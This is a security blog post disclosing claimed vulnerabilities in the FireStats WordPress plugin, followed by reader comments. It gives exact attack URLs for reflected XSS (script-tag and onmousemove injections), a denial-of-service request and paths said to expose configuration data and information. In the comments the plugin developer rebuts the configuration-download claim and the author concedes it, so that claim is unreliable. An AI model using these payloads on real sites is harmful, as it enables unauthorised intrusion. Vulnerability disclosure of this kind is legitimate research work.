More 0day wordpress security leaks in firestats!

I just tried to find more security leaks in the firestats plugin, I was specifically searching for remotely exploitable problems.

The results are 7 fresh security issues.

1x DoS:

/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1

1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).

/wp-content/plugins/firestats/php/tools/get_config.php

2x Information disclosue:

/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php

3x XSS:

/wp-content/plugins/firestats/php/window-add-excluded-ip.php?
edit=%3Cscript%3Ealert%28123%29%3C/script%3E

/wp-content/plugins/firestats/php/window-add-excluded-url.php?
edit=%3Cscript%3Ealert%28123%29%3C/script%3E

/wp-content/plugins/firestats/php/window-new-edit-site.php?
site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=<

Let's hope they patch soon because we are running Firestats too, the previous fix came very fast so I assume they will fix it this time fast too.
Oh and feel free to test the exploits against this site (but don't try out the DoS please).

Good luck Firestats team with fixing these vulnerabilities!

Hello, I am Jelmer, born in 1991, I have been playing in IT security for over half my age, I am not sure when how and why it started but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.

8 Comments

  1. Sid3^effects says:

    nice find ..hope they fix it soon :)

  2. Omry Yadan says:

    The most significant thing is of course the configuration file download, however it's totally false.

    see if you can get my config file from here:

    http://admin.firestats.cc/firestats/php/tools/get_config.php

    this php script is designed to generate a config file on demand, not to give the current one.
    for instance, here is the config file of Bill Gates:
    http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!

  3. Jelmer de Hen says:

    You are right; I looked at the code but I could not find anything worthy.
    Why would you have this function in Firestats, it's pretty pointless I think.

  4. Omry Yadan says:

    I am sure you can figure it out, if not - look at the comment in the new version of the file ;)

  5. cryptsol says:

    it was very interesting to read.
    I want to quote your post in my blog. It can?
    And you et an account on Twitter?

  6. Jelmer de Hen says:

    Yea you may quote our blog, my personal twitter is http://twitter.com/JelmerDeHen and for the entire blog where you automatically get updates as we update the site is http://twitter.com/HackAck. Feel free to follow us :) .

  7. tava tea says:

    I love what you men are usually up too. This kind of clever work and reporting! Keep up the great functions guys I' ve added you men to my blogroll, Cheers.

  8. eat thai says:

    Please. can you PM me and tell me company of much more thinks hither this. I am truly fan of inseparable' s webpage...gets solved properly asap.

Leave a Comment